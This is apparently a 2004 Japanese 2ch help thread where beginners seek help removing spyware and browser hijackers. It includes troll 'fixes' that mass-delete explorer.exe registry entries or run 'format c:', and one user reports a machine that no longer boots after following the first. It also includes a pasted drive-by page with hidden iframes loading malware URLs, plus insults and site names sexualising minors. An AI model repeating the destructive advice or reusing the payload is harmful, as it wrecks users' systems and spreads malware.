==、,-、 、ヽ、 \> ,, '''\ _ メ゙ヽ、\ ̄""" ̄--‐ 、 \ /ゝ、\ =─‐\\‐ /─'''''ニ二\''' |レレゝゝ、\  ̄く<<く >, ゙、/<三三二\ ̄\ゝゝゝゝゝゞ''ヽ、 / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ <<<<〈__入 ゙、く彡三三三二ヽくゝ\メメメゝ、_ゝ、\ | わかりました くく<<<<<< ゙、 ゙、ミ三三二ニ─ゝゝゝゝゝ,,,,,,,、 '( ゙''ヽ、ヽ、 < ご主人様 くくくくくく彡‐ヽ ゙、ミ三三二ニ'''くくゝゝ_ゝゝ、\\_,>」ノ, | 許してください… く く く く く 彡゙、゙、三三二ニ‐くゝ、/ ,,,,,,,,メメゝヽ''''"ゝゞ丶、 \_________ 二─二二彡彡、゙、三三二==くメゝ/ ゙'ヽ、メゝゝゝゝゝゝゞ''ヽ-、,,,,,,_ ‐'''" ̄ \彡彡ミ、゙、三二=''"く<メ/:: \''-、メメゝゝゝ_ゝ 、 ,,、ヽヽ 、 ,,,,- ゙彡//ヾ、三二= くゝ/:::.... \>∠レ-,-‐ニ二メヽ''ヽ ノ ゙ヽ、,,,-‐//_///,,、゙、三二= ゙、 ""''' ヽ>//レレヽ,,___ / -,,,,,,-‐'''"""/////,,ヽ ゙、三二─ ゙ヽ. //-ヘヘ,、 レレレレノ ''" ,l|"////ノ,、\彡'''''‐-ニ,、 ::::::::::,,,,,,,,// ゙ヽフ/|/| レ' /ゝ、/ヽ|ヽレ,,゙ヽ、゙''ヽ、,,,,,,_ヽ''ニ='',,-'"、─-,,,,,_  ̄"'ノ /メ / レ/,''"へへべ''─---- ̄-メヽ"ゝゞゝヽ、 >---''" /ヘヘ、|//ヘヘヘヘヘヘヘヘ,,-イ ̄ | ̄"'''-ニニニ二-''" /ヘヘ∧/./フヘヘヘヘヘヘヘ,/イ / / / ゙ノ\、\ /ゝゝ| / /メヘヘヘヘヘヘ/'" | / / / / \\ /ゝ /|‐/ /フヘへヘヘヘ/∧ /-'"-'''"__,,-''" / /、\ //|_| /./へへへヘヘ、// |/ \_,,,,-‐'" / ゙、.゙、
>512 それならノートンのウイルス検索で治るよ
531 :
ひよこ名無しさん :04/11/27 00:03:11 ID:rK18V+T0
前外道の細道というサイトに飛ばされて標準設定がabout;blankになってしまい クールウェブシュレッダーを使いそれは直せたのですがそのサイトに飛ばされていらい Play pokerというポップアップが出てきたりウィンドウズセキュリティという ポップアップが出てきてしまいます。 どうすれば直るのでしょうか?
こんな根性悪しかいない スレはさっさと消えて無くなれ!
たぶん知障だろ
エロサイト見たらPCのキーボードに射精しちゃって困ってます。 誰か何とかしてください。
537 :
ひよこ名無しさん :04/11/27 11:30:57 ID:5IvWJ1rD
>>538 あ、すいません
焦ってたのでテンプレ見てませんでした
どうやら無視してればいいようですね
ありがとうございました。
540 :
ひよこ名無しさん :04/11/27 13:23:24 ID:iQ657K1n
別のスレから誘導されてきました。 変なサイトを踏んでから、デスクトップの背景が業者のリンクになってしまったんですが、 どうすれば元に戻せるのでしょうか?
541 :
ひよこ名無しさん :04/11/27 13:25:36 ID:P4tV2O7B
俺、相当痛い目にあってきた者だけどさ 最初から読んでたら必ず解決すると思うんだけど。。。 例えば、ad-aware入れたら問題なくなったし 個別の問題だってそのつど書いてあるだろう
>>540 キーボードでCtrl+Fを押して「テンプレ」という言葉を検索してください。
F3を押せば次々に見ていけるので便利ですよ。
ついでに、戻りたいときはShift+F3でいけます。
( ・∀・)つ〃∩ ヘェーヘェーヘェー
助けてください。 インターネット繋ぐと強制的にシャットダウンされてしまいます。いま携帯からのカキコです。 数ヶ月前、スパイウェアにやられて、某電気店に持っていったのですが、初期化してみては? といわれたので、家でやってみました。しかし直らなかったので、まったくPCにさわっていませんでした。どうすればいいですか? ★WindowsXP Home Edition ver.2002 ★IE ver.6.0 ★Prius Note200C ★ADSL よろしくお願いいたします。
>>545 3年ほど前だったかMSブラストというやつでそういう風になったなあ
すぐ解決できたけど
547 :
あほんだら :04/11/27 16:00:28 ID:2Qa8iPfY
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~許してごめんなさい
548 :
545 :04/11/27 16:42:05 ID:w8q7Qo/E
>>548 初期化してネット繋げたらすぐwindows updateしないと無限ループするよ。
>>548 2ちゃんでもいっぱいスレたってたからなあ。忘れたなあ。
MSブラストに感染したの去年の夏だった。PCはじめたのが3年ほど前でウイルスやトロイに感染したの初めてでどうしていいか分からなかったけど 2ちゃんで解決できたんで感謝してるよ。
552 :
ひよこ名無しさん :04/11/27 17:37:32 ID:qNYJrgEI
win2000使用。213.159.117.134/index.phpにかかって居ます。 順をおってお聞きしたいんですが、Spybot-Searchで赤で表示される DSO Exploit CoolWWWSearch.Googlems CoolWWWSearch TIBS 以上の4つは削除しても平気か教えて下さい。
553 :
ひよこ名無しさん :04/11/27 17:39:43 ID:FABh4zXz
DSO Exploit以外は削除しても平気
554 :
552 :04/11/27 18:03:10 ID:qNYJrgEI
>>553 ありがとうございます。
実行しましたが直りませんでした。Hijackの方をやってみます。
555 :
552 :04/11/27 18:25:27 ID:qNYJrgEI
ギコナビ怪しいんですが削除したら直るってこと有りませんよね?
googleのツールバーで英語が混じった文字で検索すると、
ttp://www.thefreedictionary.com/ のサイトが一番上に表示されます。
AD-AWARE SpyBot CoolWebSearchと試したのですが直りません。
以前、ループにあってしまって「yes」を押して変なファイルをダウンロードしてからそうなりました。
どうか直し方教えてください。お願いします。
557 :
ひよこ名無しさん :04/11/27 19:35:23 ID:ZKacdFWU
558 :
ひよこ名無しさん :04/11/27 19:37:15 ID:NOJNw2pu
559 :
ひよこ名無しさん :04/11/27 21:01:50 ID:ZEZHRX8E
お願いします。教えて下さい!
最近PCを買い替え、現在、XPで、IE使用しています。
で、Web上をうろうろしていると、突然、飛ばされてしまいます。
飛ぶ先は
ttp://air689.startdedicated.com/というエロサイト (?)で、
プログラムをダウンロードするPOPウィンドウが際限なく開き続けます。
ノートンではシステムに問題なしとのことで、こちらに出ている
CoolWebShredderを試してみたのですが、やはりCleanという結果でした。
あと、何をしてみたら良いでしょう?
>>559 スパイボットサーチアンドデストロイ
アド アウェアSE
>>all 困ったことがあったら↓の方法を実行します。 パソコンのトラブル解消法 スタートをクリック ↓ ファイルを指名して実行をクリック ↓ regeditと入力してOKをクリック ↓ レジストリエディタが開く ↓ 編集をクリックして検索をクリック ↓ explorer.exeと入力して検索をクリック ↓ 検索して見つかったものを片っ端から削除 ↓ 検索が終わったらパソコンを再起動 ↓ 問題解決 ↓ (゚∀゚)ウマー
>561 ひとつだけ間違いがあるよ。 ×検索して見つかったものを片っ端から削除 ○検索して見つかったものを片っ端からぬるぽ.exeに変更
563 :
ひよこ名無しさん :04/11/27 23:07:34 ID:Oc4pFhOn
ぬるぽって英語でないですが良いんですか?!
ぬるぽ ↑ なんかエロいな
567 :
ひよこ名無しさん :04/11/28 01:32:14 ID:XNuD2GSI
568 :
ひよこ名無しさん :04/11/28 01:33:12 ID:SpkQaDDz
↑ブラクラ危険になってるよぅ・・・ 556です。めんどくさいんでリカバリしました。すいませんでした。
こういうスレにまで貼る香具師いるんだねぇ。 危険URLのひとつです、だった。
だーくろりーたでした〜。
572 :
ひよこ名無しさん :04/11/28 11:21:45 ID:Q4XmY6x7
だめだ、全部の手を尽くしてもダークロリータが抜けきれない。 ホームページは変わったままだし起動毎にexeあるし・・・・
踏んじゃったの?
574 :
ひよこ名無しさん :04/11/28 11:24:50 ID:Q4XmY6x7
>>573 そうでつ。無知で・・・
いつもはシステム復元で乗り越えてきたけど今回やろうとすると
進行バー(?)が全く進まない。
システム復元というより ノートンかバスター、spy-botとAd-Aware(ダブルで)でしょ
>>575 オンラインのスキャンとダブルももうしたんです。。(一応いろいろ駆除した)
でも再起動すれば元通りに・・・・・
>>576 完璧にスパイは無くなったの?スパイが走ってる時に
削除しようとしても消せないのあるからね。(セーフモードでもやってみるとか)
それと.exeは名前何?msconfigスタートアップに登録されちゃってるの?
チェック外せない?
俺もダーク2〜3度ノーガードで踏んだ事あるけど何とも無いぜ。
>>577 すみません!再起動したら直ってました━━━━(゚∀゚)━━━━!!
12うんたら.exeも無くなってて、ホームページも既定のものでした。
しばらく様子見てみます、ありがとございます
581 :
ひよこ名無しさん :04/11/28 16:47:53 ID:tyY7ClXP
Play pokerというポップアップが出てきたりウィンドウズセキュリティという ポップアップが出てきてしまいます。 どうすれば直るのでしょうか?
582 :
ひよこ名無しさん :04/11/28 19:08:45 ID:40VAQ1f4
クリックしただけでお金支払わないといけないって言うのは 無いということなんでしょうか?
584 :
ひよこ名無しさん :04/11/28 22:41:03 ID:nJjUFMQ4
他スレで似たような事書いたけど クリックしただけで金払わなくちゃならないんなら 間違えて子供が入会してしまったらどうなるの? そう考えてボクは無視しましたよ
ないがさすが?
588 :
586 :04/11/28 23:12:13 ID:???
ごめん まじでなにが流石なの? 無視するのは普通じゃないの?
589 :
ひよこ名無しさん :04/11/28 23:28:56 ID:XNuD2GSI
いちいちうるせえな タコ
何だともういっぺん言ってみろ(太尊)
591 :
ひよこ名無しさん :04/11/29 08:22:53 ID:F9NJp/xe
集金か。詐欺師。 家に来るのか。上等だな。 来るなら来てみろ。腐れ外道が。
593 :
ひよこ名無しさん :04/11/29 13:25:46 ID:EB4DBzYc
エロサイトを18歳以上なので同意してenterした瞬間IPアドレス等を勝手に登録されてしまいました 後から利用規約を読んだところ17000円を4日以内に入金してください。となりました。 サイト自体はenterしただけで何も使っていませんが支払いしないといけないのでしょか?
594 :
ひよこ名無しさん :04/11/29 13:28:34 ID:EB4DBzYc
ちなみに>>6はよみましたが不安です。 債権回収者に勝てる自身がありません。
エロサイトを18歳以上なので同意して、とわざわざ書くというのは18歳未満
ここに書いてある一通りの方法をためしてみたのですが、
http:// air689.startdedicated.com/ (ここのリンク先へ行くとウイルスに感染する模様)
PCをつけていると突然ブラウザが起動して上記のサイトに接続されてしまいます。
ウイルスを削除してスパイウェアもない状態でも出てきてしまいます。
初期化する他ないのでしょうか・・
598 :
ひよこ名無しさん :04/11/29 18:15:20 ID:uXEW0hl1
エロサイトではないのですが飛んだらスパイウェアにかかりました 修復してもエクスプローラーってやつが復活してしまいます ウィンドウズ98からXPに変えたらなおるでしょうか?
治るわけねえだろハゲ テンプレ100回復唱して出直して来い
98使ってて知識もスキルもない奴ってどうしようもないよな。 はやく自分で働いて稼いだ金で新しいの買ってくれよ。
601 :
ひよこ名無しさん :04/11/30 00:14:41 ID:yvr764Di
602 :
ひよこ名無しさん :04/11/30 00:16:16 ID:98FC21eh
603 :
ひよこ名無しさん :04/11/30 00:19:03 ID:/r96OvtE
PC初心者質問スレから誘導されて来ました。
2chのとあるスレに貼られていたURLに飛んだらIEの調子がおかしくなりました。
他の皆は平気なようでしたし、そのサイトもアダルトサイト等ではなかったのですが……
まず、IEを起動すると左側に検索ページとして
http://www.gocybersearch.com/ie/ が表示されるようになってしましました。
また、何もしていなくてもIEを立ち上げてから暫くすると
http://www.gocybersearch.com/dir.php という全部英語のページが画面いっぱいに広がって閉じられなくなってしまいます。
Alt+F4は勿論、Alt+Ctrl+Deleteまで効かない時もあります。
ウィルスバスター、Ad-Awere、Spybot-S&Dを使い、検出されたファイルを全て削除しても
効果がなく、相変わらずIEで上記ウィンドウが開いてしまいます。
Web設定をリセットしても無駄でした。
Googleツールバーのポップアップブロックも反応してくれません。
IEを開く都度再起動や強制終了しなければならなくなるのは辛いので、
対処法がわかるかたがいらっしゃいましたら教えていただきたいです。
>>603 >他の皆は平気なようでしたし
>ウィルスバスター、Ad-Awere、Spybot-S&Dを使い
次からはやられる前にこれらを入れとけ。みんなそうしてる。
だから平気なんだよ。
直すためにはテンプレを熟読しなければならないが、
あんたには無理っぽいから今回はリカバリしとけ。
605 :
ひよこ名無しさん :04/11/30 00:39:48 ID:yvr764Di
606 :
603 :04/11/30 00:49:20 ID:/r96OvtE
>604 一応、元から入れてはあったのですが…… テンプレ20回読んで、解らなかったらリカバリする事にします。 お手数掛けて申し訳ありませんでした。
607 :
ひよこ名無しさん :04/11/30 03:20:20 ID:MYr6U3MT
なんかマウスの調子が悪くて一回しかクリックしてないのにダブルクリックになってしまいます。
608 :
ひよこ名無しさん :04/11/30 03:24:22 ID:2dgO/3P5
ガスガスフルフルガスワンダフル(・∀・)
え?
610 :
ひよこ名無しさん :04/11/30 04:45:07 ID:tni/BgHq
携帯からの緊急書き込みです。FFドラクエ板の「ご利用は計画的に」というスレの600〜700ぐらいにあるウィルスを食らってしまいました…WinMe、IE使用でウィルス対策はほとんどしてませんでした…
611 :
610 :04/11/30 04:46:03 ID:tni/BgHq
現在の状況はIEは辛うじて使える、マイコンピュータなどを開いても大丈夫だが「システムの復元」や「アプリケーションの追加と削除」等を開こうとするとエラーが出てきます。助けてください!
もう手遅れでした…お騒がせしてすいませんでした。
>>611 IE使えるんならオンラインスキャンやスパイウェア駆除はしないんですか?
614 :
ひよこ名無しさん :04/11/30 06:20:15 ID:tni/BgHq
いえ、とうとうIEもエラー、何開こうとしてもエラー、何もしなくてもエラーするのでリカバリしました。にしても答えてくれただけで本当に感謝。世の中には良い人もいるのになぁ…
format c:
format c: って実際やろうとしてもCドライブ以外からOS起動しないといけないから誰も引っかからないぽ
HDD初期化すればどうだろう
http://pc6.2ch.net/test/read.cgi/pcqa/1101719647/l50 このスレから誘導されました。そもそも何が原因でこhなるのかが分からないので
テンプレ読んでも駆除のしようがありません。
IEsp2で、特定のサイトへ訪問してしばらく経つと、
ブラウザタブには「XXX」と表示され、
You are about to enter an Adult site.
Click here to enter!というページに飛ばされます。
また、飛ばされる前のサイトは不特定多数で、ソースなどを表示してみても、サイト自体には問題ないと思います。
どうすればこのXXXページに飛ばされなくて済むでしょうか?
またこのXXXというページには何も問題はないのでしょうか?
622 :
ひよこ名無しさん :04/11/30 14:43:02 ID:IS8mcQpY
>>621 そもそもスパイウェアなのかウィルスなのか分からんので
テンプレ読んでも駆除のしようがありません
じゃあそのまま放っておいてね。私のPCじゃないので あなたが手探りでも何かをして原因を探る努力をするしかないのです。 ばいばい(´ー`)/~~
>>623 最初から回答する気ねえなら俺にレスつけんじゃねーよクズwwww
リアル世界でストレス溜まってるからって2chで解消してんじゃねーようんこ野郎ww
きもすぎwwwwww
>>620 何もできないデブの解決法、
1.何もせずにお菓子喰ってひたすら我慢。
2.リカバリ。
だまされるなよ。怪しいと思ったら一旦右クリックでファイルに保存してみろ。 俺は踏んでもどうもならないが、 初心者どもは極窓というソフトを入手してショートカットを「送る」メニューに登録しておけ。 怪しいリンクの画像ファイルは JPGではなく大抵はHTMLファイルだ。つまりは画像をみるつもりでクリツクするとサイトに とばされてウイルスまみれになるように仕込まれた稚拙な罠だ。 ここに来るようなやつは大体こんな感じでやられて助けを求めに来るんだろ? 画像の拡張子に簡単にダマされて前脹らませてるんじゃねーぞおまいら。
>>624 そっくりそのまま返してやるwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww
<html><head><title>DARK LOLITAS</title>
<BODY BGCOLOR="#02010B" TEXT="#3B22EB" LINK="#F40A5C" ALINK="#E6E118" VLINK="#F10B5C">
<head>
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=windows-1251">
<iframe src="
http://213.159.117.131/dl/ms.php " height="1" width="1"></iframe>
<IFRAME SRC="
http://x.full-tgp.net/?ms.com " WIDTH=1 HEIGHT=1></IFRAME>
<IFRAME SRC="
http://pdnqs.selfbookmark.info/enter.cgi?id=1259 " WIDTH=1 HEIGHT=1></IFRAME>
<body onUnload="window.open('
http://adult-traffic.org/advert/console.php?id=75RYmf ')">
</head>
<base target=_blank"><br><br>
<br><div align='center'>
<table border='1' cellpadding='0' cellspacing='5' bordercolor='#cc3366'>
<tr>
<td colspan='4' class='bg01'>
<table border='0' cellspacing='0' cellpadding='0'>
<tr>
<td width='600' align='center' valign='middle'>
<span class='type03'><center>Teen sites ! Best sites ! BBS ! Only pornitas !</center></span></td>
<td align='right' valign='middle'></td>
</tr>
</table>
</td>
</tr><tr><td width='140' align='center' class='bg02'><span class='type04'>Teensart</span> <span class='type01'></span></td><td width='140' align='center' class='bg02'><span class='type04'>Redteens</span> <span class='type01'></span></td><td width='140' align='center' class='bg02'><span class='type04'>Wetballs</span> <span class='type01'></span></td><td width='140' align='center' class='bg02'><span class='type04'>Uncensored-teens</span> <span class='type01'></span></td></tr><tr><td width='140' align='center' class='bg02'>
<img src='
http://61.194.13.120/bn/sam/img/11.jpg ' width='140' height='60' border='0'></a></td></tr><tr>
<td width='140' align='center'><span class='type02'>
</span></td><td width='140' align='center'><span class='type02'></span></td><td width='140' align='center'>
<span class='type02'></span></td><td width='140' align='center'>
<span class='type02'></span></td></tr><tr><td width='140' align='center' class='bg02'>
<span class='type01'>Loteens</span><span class='type01'></span></td>
<td width='140' align='center' class='bg02'><span class='type01'>Couplescollection</span>
<span class='type01'></span></td><td width='140' align='center' class='bg02'>
<span class='type01'>Losexyboys</span><span class='type01'>
</span></td><td width='140' align='center' class='bg02'><span class='type01'>3drape</span>
<span class='type01'></span></td></tr><tr><td width='140' align='center' class='bg02'>
<tr><td width='140' align='center' class='bg02'> <span class='type01'>Kristina bbs</span><span class='type01'></span></td><td width='140' align='center' class='bg02'> <span class='type01'>SexYTeen bbs</span><span class='type01'> </span></td><td width='140' align='center' class='bg02'><span class='type01'>Marina bbs</span><span class='type01'> </span></td><td width='140' align='center' class='bg02'><span class='type01'>Lolita bbs</span> <span class='type01'></span></td></tr><tr><td width='140' align='center' class='bg02'>
<img src='
http://61.194.13.120/bn/sam/img/10.jpg ' width='140' height='60' border='0'></a></td></tr><tr>
<td width='140' align='center'><span class='type02'></span></td><td width='140' align='center'>
<span class='type02'></span></td><td width='140' align='center'><span class='type02'>
</span></td><td width='140' align='center'><span class='type02'></span></td></tr></table></div></body>
ウィルスが反応したよ。
荒らしですか
なんじゃこれはー?
こりゃあアク禁だな、どうせまたdionなんだろうなorz
秋葉原.jp
647 :
ひよこ名無しさん :04/12/01 01:07:19 ID:jNiYPD9J
McAfeeでウイルススキャンしたんだけど、そして駆除作業してると、 その中で、「ファイルは感染していません」ていうのがあるんですが、 これは大丈夫ということなんですか? 一応検出したやつだから、そうなのかなと心配になったのもで。
ん?どのファイル?
649 :
647 :04/12/01 01:16:34 ID:jNiYPD9J
例えば、C¥program Files¥Commom Files¥CMESys.exeとか。 でもスキャン情報ではウイルス名書いてるけどどうなんだろ。
CMEは消したほうがよかったんじゃなかったっけ?
652 :
647 :04/12/01 01:28:08 ID:jNiYPD9J
あと、スキャン情報で、ウイルス名で、Adware-G…て、 …は何書いているんだろうとか(ウイルスの正確な名前を知りたい)、 状態で、ウイルス駆除を完了するために…の「…」に何かいてるのか気になります。 そこのウイルス情報がトロイの木馬なので。 ダブルクリックしてもHP繋がるだけでみれないなぁ。 そういうものかな。
653 :
647 :04/12/01 01:30:14 ID:???
画像プレビューに設定してるビューアなら一発でころり棚
まんこ んこま こまん
まぁとりあえずHTMLCheckerでもいれておけ
657 :
ひよこ名無しさん :04/12/01 14:09:13 ID:hhq+/sqQ
誘導されてきました。 GAINがインストールされたんですが削除方法教えてください
>>657 お前よぉ、各スレにはそのスレのルールってもんがあるんだけどよ
そのルールってのはどこに書いてあるかしってっか?
スレ取得しても必ず表示されてる
>>1 なんだよな。テンプレも読めないような奴が俺らの回答を読めるのかい?
>>532 バカか?お前。2chなんて性格最悪のクズしかいねーんだからどこ行ったって一緒だよ。友達もいないクズ共が集まるサイトなんだからさ。
助けて下さい。 スレに貼ってあるURLを踏んだらウィルスにかかってしまいました。 ウィルスは削除されましたと出たんですが 次に何をするか分からなくてPCを強制終了してしまいました。 次にPCの電源を入れるとまだエロサイトのファイルがあったので削除しよいと思ったらエロサイトにとんで Χを押しても英語で「出たい?」と出て OKを押してもただでは出してくれそうに ないのでまた強制終了しました。 次にPCの電源を入れるとスパイウェアをここをクリックして殺せみたいな文が出てきたけど これも怪しそうで押しませんでした。 んでまた強制終了しています。 どうやればファイルを消せるんですか? ちなみに専門用語は全く分かりません。
>>661 メシ喰ったらテンプレを読んで勉強してとりあえず今日は何もせずに寝ろ。
やったー! ついに…ついに念願のスパイウェアに感染したよー!! アンチウィルスソフトにファイアーウォールが入っていたんだけど msconfigのスタートアップでチェックを外して再起動。 そしてインターネットオプションでセキュリティを「低」に設定しネットに 繋いで海外のエロサイトを丸1日閲覧したりして遊んでいたら やりましたスパイウェアが入っていました。 これから削除作業に入るので、切断します。
663だよー! すげー楽勝じゃんか! だってだって、レジストリをちょいちょいって編集するだけでスパイウェアが 消えちゃうんだもん。 レッドロフもカリプスもダークロリータもレジストリをちょっとだけ編集したら 消えちゃうし。みんなお手上げっていうスパイウェアも簡単に消せたね。 余りにも呆気無くて面白かったので、もう1回感染してこよおっと。
665 :
661 :04/12/01 21:55:11 ID:acdhkJfe
666 :
ひよこ名無しさん :04/12/01 22:00:37 ID:KADKBYqr
about:blankと出ます。 テンプレ(9で勉強しようと思ったのですが、403になってしまいます。 どなたかご教授願います。
>ちなみに専門用語は全く分かりません。 そうですか、じゃあ勉強するか業者に頼んでください
出張スパイウェア駆除サービス
スパイウェア駆除サービス料金
出張基本料金 90分まで8,888円
追加料金 追加30分ごとに2,500円
データバックアップ料金※1 別途見積もり
対応OS Windows XP・2000・NT・Me・98
料金の目安 スパイウェア駆除 25,000円前後(作業時間5〜6時間)
OS再インストール 14,000円前後(作業時間2〜3時間)
スパイウェアの感染状況により駆除出来ない場合がございます。
その際にはOS再インストール作業に速やかに移らせて頂きます。
この時リカバリーCDが無い等お客様のご都合により作業が完了しない場合がございます。
そのような場合でも作業に要したお時間分の費用が発生致します
確実に症状をなくすにはOSの再インストールをお薦めしています。
http://www.compu-express.co.jp/pasores/spyware.html
なんかぼろ儲け
671 :
ひよこ名無しさん :04/12/02 10:45:18 ID:AhVldCPS
坊主丸儲けって言いますし。
リカバリCDがないだけでお手上げの業者なんて存在価値無し。パソコンの本訪問販売した方が儲け出る。
OS再インストール 14,000円前後(゚Д゚)ハァ?
うおぉおぉぉぉおー!ホームが書き換えられた!スパイウェアか?そうだ、出張スパイウェア駆除サービスに相談しよう。 業者「スパイウェア駆除したんですがうまく出来ませんでした。(作業時間5〜6時間)OS再インストール しときました。 (14,000円前後) それじゃ、払ってくださいね」
(作業時間5〜6時間)のところは(25,000円前後)
>確実に症状をなくすにはOSの再インストールをお薦めしています。 帰れ、だな。
678 :
ひよこ名無しさん :04/12/02 14:13:00 ID:MtJ9ziQh
onee ばか
スパイウェア駆除で5〜6時間?うそん。
テンプレの全部やっても削除できないんです。 「windowsが使ってます」みたいに表示されて削除できない…… OSは98、NECです。
>>680 テンプレちゃんと読んで全部やったら、その質問は出てこねーと思うな、うん
「セーフモードで削除しろ」 「セーフモードってなんですか?」 「再起動後F8を連打」 「やりかたがわかりません。」 「リカバリしろデブ」 「わかりました」
>>680 windowsの中の人に使うのをやめてくれとお願いしてから削除
確実に症状をなくすにはOSの再インストールをお薦めしています。
>スパイウェアの感染状況により駆除出来ない場合がございます。 >その際にはOS再インストール作業に速やかに移らせて頂きます。 ワロタ
>>683 のサイトは真面目にやってはいるんだろうが、
多少知っている奴らから見れば「そりゃねえだろ?」って感じだな。
>>686 の場合も含めて。
金額は別としても、そういう作業は見直すべき。
688 :
ひよこ名無しさん :04/12/02 17:56:45 ID:2eRqvqyJ
助けて下さい! c:\windows\explorer.exeをマイコンピュータから削除しようとしたのですが、 「windowsが使っています」と出て消せなかったので、セーフモードで起動して 削除しようとしても、「windowsが使っています」と出て削除することができません。 またコマンドプロンプトからの削除もコマンドを受け付けなくて削除することができません。 そこでレジストリエディタを開き、explorer.exeを検索して見つかったものを 片っ端から削除して検索が終了したらPCの電源を切りました。 そしてパソコンの電源入れました。すると… パソコンが起動できなくなってしまったー! セーフモードですら起動できません(/_;) どうしたらいいのですか。
( ´_ゝ`)フーン
690 :
ひよこ名無しさん :04/12/02 18:17:44 ID:uFlrVqij
教えてください! workflow.exeってなんなんでしょうか?ウイルスかなんかですか? ↑のせいでyahooのseupCD-ROMがうまく動かないんです。 助けください
691 :
ひよこ名無しさん :04/12/02 18:36:38 ID:89nDcpjm
spybotをダウンロードしようとすると、「ファイルをコピーできません。送り側のファイルまたはディスクから読み取れません」と出てしまうのですが、どうすればいいでしょうか?
まぁとりあえず、落ち着きなさい そしてRegseekerを使いなさい きっと道は開けるでしょう
(((((((( ;゚Д゚)))))))ガクガクブルブルガタガタブルガタガクガクガクガクガク
694 :
ひよこ名無しさん :04/12/02 19:28:32 ID:IxTWgKzv
696 :
ひよこ名無しさん :04/12/02 19:34:11 ID:IxTWgKzv
>>695 さん
これウイルスではないんですか?「THE END」ってでてきませんでした?
697 :
694 :04/12/02 20:33:37 ID:IxTWgKzv
だ、誰か・・・。
699 :
694 :04/12/02 20:38:48 ID:???
直リンするやつはとりあえず死んどけ
>>699 ただのgifアニメ。実際にダウンロードしてるわけじゃない。心配せんでいい。
702 :
ひよこ名無しさん :04/12/02 20:54:00 ID:uFlrVqij
>>692 Regseeker探したんですがレジストリがどうとかって書いてありました。
レジストリはいじるの怖いんですが・・・
704 :
694 :04/12/02 21:00:39 ID:???
>>700 すいません「直リン」ってなんですか?
>>701 ホントありがとうございました。ウイルススレでも「心配しなくていい」と
言っていただけました。ありがとうございました
>>703 漢でも男でもないおいらには使えないソフトだなw
使用した人、みんな戦死してるじゃん・・・
>>704 2チャンで言う「直リン」とはhttpのhを抜かずにそのまま貼ること。本当は違うけど。
708 :
694 :04/12/02 21:10:52 ID:???
709 :
ひよこ名無しさん :04/12/02 23:35:58 ID:/R9YHxQj
ttp://x.full-tgp.net/?ms.com ↑
を踏んでしまいました。
OSはME、ブラウザはIE(踏んだのはギコナビから)、セキュ関係のソフト無し。
パソコンを起動したら「〜〜〜(何とか)32を開始出来ません」とか出て
起動出来ませんでした。一度セーフモードで立ち上げてノーマルモードで
立ち上げ直したらとりあえず今は普通に動いているのですが・・・。
どのようにこのウイルスを除去したらよいのでしょうか?よろしくお願いします。
>>709 ウィルスはウィルススキャンして自動でも手動でもお好きなように
スパイウェアのほうはここのテンプレだ〜な
711 :
709 :04/12/02 23:48:30 ID:/R9YHxQj
>>710 レスありがとうございます。
とりあえずトレンドマイクロのウイルスチェックしてみたら
c:\WINDOWS\loadclean.exe は Downloader.Trojan に感染しています。
c:\WINDOWS\Downloaded Program Files\mfwtfeen.exe は Downloader.Trojan に感染しています。
c:\WINDOWS\Temporary Internet Files\Content.IE5\47W9YX87\sahra6138[1].jpg は JS.WindowBomb に感染しています。
c:\WINDOWS\SYSTEM\host32.exe は Downloader.Trojan に感染しています。
c:\Program Files\Internet Explorer\mfwtfeen.exe は Downloader.Trojan に感染しています。
c:\Program Files\gikoNavi\Log\2ch\ascii\1091964131.dat は VBS.Internal に感染しています。
c:\Program Files\gikoNavi\Log\2ch\ascii\1091636414.dat は VBS.Internal に感染しています。
c:\Program Files\gikoNavi\Log\2ch\ascii\1092044116.dat は VBS.Internal に感染しています。
c:\Program Files\gikoNavi\Log\2ch\ascii\1093158180.dat は Macro.src に感染しています。
c:\Program Files\gikoNavi\Log\2ch\ascii\1098344495.dat は VBS.Internal に感染しています。
c:\Program Files\gikoNavi\Log\2ch\ascii\1098026439.dat は Macro.src に感染しています。
と出てきましたorz 自力で駆除出来るものなのでしょうか?テンプレ読み直します。
712 :
kikiki :04/12/02 23:51:08 ID:mhh6RYkf
とても恥ずかしい話なのですが、アダルトサイトに接続した際にスパイウェアに侵入されたらしく、インターネットを起動する際に、「WINDOWSインストーラ、Microsoft offce XP parsonal」というのが起動してしまうようになってしまいました。 どうすれば直せますか? スパイボット、Hijack Thisなどで大体のスパイウェアは削除・修正することができたのですが、これだけは直せませんでした。何かの設定がおかしくなっているのでしょうか? どなたか知ってる方、よろしくお願いいたします。
>>711 これは一時ファイル削除
c:\WINDOWS\Temporary Internet Files\Content.IE5\47W9YX87\sahra6138[1].jpg は JS.WindowBomb に感染しています。
ギコナビのログは誤反応だと思うけど、トレンドって誤反応出たっけかな?
あとのはトレンドのウィルスデータベースで検索して駆除しとけ
714 :
709 :04/12/03 00:05:46 ID:rCsLUwFW
トレンドマイクロのページにある駆除方法(以下)を参照に調べてみたのですが、 該当するものがありませんでした。どういう事なのでしょうか・・・・。 このワームの自動起動設定を削除します: Windowsのレジストリエディタ(regedit.exe)などを使用して以下のレジストリの値を削除してください: 場所:HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run 値 :wersds.exe = "%System%\doriot.exe" 場所:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run 値 :wersds.exe = "%System%\doriot.exe"
